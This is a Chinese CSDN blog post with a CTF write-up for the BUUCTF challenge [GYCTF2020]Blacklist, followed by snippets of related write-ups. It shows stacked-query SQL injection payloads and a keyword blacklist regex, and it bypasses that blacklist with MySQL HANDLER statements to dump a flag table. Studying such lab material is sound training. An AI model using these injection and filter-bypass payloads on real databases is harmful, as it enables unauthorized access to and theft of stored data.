[GYCTF2020]Blacklist

最新推荐文章于 2024-10-09 12:58:26 发布
最新推荐文章于 2024-10-09 12:58:26 发布
阅读量192 收藏 5
点赞数 4
分类专栏: 网络安全 buuctf 文章标签: 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65279640/article/details/138001050
版权

打开题目,看到是

应该又是sql注入,开始进行判断闭合符号,输入'发现出现。

那么闭合符号大概率就是 ' 了

解这尝试了正常解法,发现都不能解出。之后尝试使用堆叠。

输入

1';show databases;

出现

那么使用来查询都有哪些表

1';show tables;

发现有FlagHere,flag大概率在这里,之后使用

1';show columns from FlagHere;

出现

 

flag果然在这里,之后再使用

1';select * fron FlagHere;

来找flag字段值,但是出现了

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

看来把很多东西都过滤了。

之后使用AI来搜寻可以实现与select相同作用的命令,找到了一个名为HANDLER的命令

之后将这几条语句进行堆叠,成功得到flag。

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

以下我总结了一篇关于HANDLER命令使用的文章,有兴趣的可以看一下

MySQL HANDLER命令:一种独特的表数据访问方式-CSDN博客

masa010
关注
专栏目录
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 2627
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通,看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法 心得:学会新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
[GYCTF2020]Blacklist 1
m0_73728268的博客
03-15 388
2.继续构造payload,1’ or 1=1#,确定了闭合方式。使用接下来的语句 1’;1.感觉像是一种注入,blacklist黑名单绕过。更具一系列操作可以判断出闭合方式为。handler函数运用。
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1170
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
[GYCTF2020]Blacklist(堆叠注入)
记录学习,一起进步
01-19 2028
[GYCTF2020]Blacklist(堆叠注入)
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1436
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1653
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
buuctf [GYCTF2020]Blacklist
m0_63883187的博客
01-14 137
不懂得欢迎私信交流
[GYCTF2020]Blacklist1-BUUCTF-详解
chinese_cabbage0的博客
02-05 1823
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
web:[GYCTF2020]Blacklist
sleepywin的博客
10-31 108
猜测flag在FlagHere表中。这里猜测flag在flag列中,尝试获取内容,提交为3-1,发现页面回显为空白。猜测是sql注入,先测试。回显了黑名单限制的关键字。点开靶机,页面显示为。可以判断为字符型注入。
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 711
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1
bazzza的博客
12-23 308
blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入,接着使用order by判断字段,发现字段数为2,但在接一步的注入中,出现提示,遇到阻拦。 这个地方使用正则过滤了一些关键字,在尝试绕过的时候也失败了,但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名,然后再进行堆叠注入,(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 822
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
buuctf刷题
qq_41788704的博客
10-28 2013
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
鲁班到家上门安装维修系统源码开发之结构功能解析
weixin_43744973的博客
10-08 913
鲁班到家上门安装维修系统的源码开发是一个复杂但富有成效的过程。通过详细的需求分析、技术选型、功能模块设计以及前后端分离开发,该系统不仅提升了服务效率,还通过数字化管理优化了用户体验。未来,该系统有望在智能家居售后服务领域发挥更加重要的作用,引领行业向更加高效、专业、透明的方向发展。
ATAM需求说明-系统架构师(七十六)
ke1ying的博客
10-08 859
1体系结构权衡分析法ATAM(Architecture Trade Off Analyzer Method)是一种常见的结构权衡分析法,该框架主要关注系统的(),针对性能、安全性、可用性和可修改性,在系统开发前进行分析、评价和这种。A共享数据库的集成方式通常将应用程序的数据存储在一个共享数据库中,通过制定统一的数据库模式来处理不同应用集成需求。场景和需求的收集,架构视图和场景的实现,属性模型的构造和分析,架构评价和折中。7企业信息资源集成管理的前提是对企业()的集成,其核心是对企业()的集成。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 351
Wintergrasp 冬拥湖 120 VS 120
应对Redis大Key挑战:从原理到实现
最新发布
欢迎来到【技术拾光者】,在这里,我们专注分享编程教程、技术趋势、实战案例和优质资源。不定期举办技术问答、专家访谈和职业指导。加入我们,共同探索技术世界,提升技能,拓展职业道路!
10-09 935
在使用Redis时,大Key问题会导致性能下降、内存消耗过多等问题。本文详细探讨了大Key问题的成因、影响及解决方案。大Key问题通常由大字符串、大集合或大对象引起,影响系统的内存使用和响应时间。通过拆分大Key、分页读取、异步删除和监控预警等方法,可以有效解决大Key问题。文章提供了Java示例代码,展示如何处理和优化Redis中的大Key问题,包括手动拆分大Key、分页读取大集合和异步删除大Key等。通过这些方法,开发者可以显著提升Redis的性能和稳定性。
同城O2O系统源码与跑腿配送平台的架构设计与开发方案详解
meihusdk的博客
10-08 407
同城O2O系统与跑腿配送平台的开发,既是技术的挑战,也是商业机会的探索。通过合理的架构设计与清晰的开发方案,开发者可以构建出高效、稳定且易于扩展的平台,为用户提供更为便捷的服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值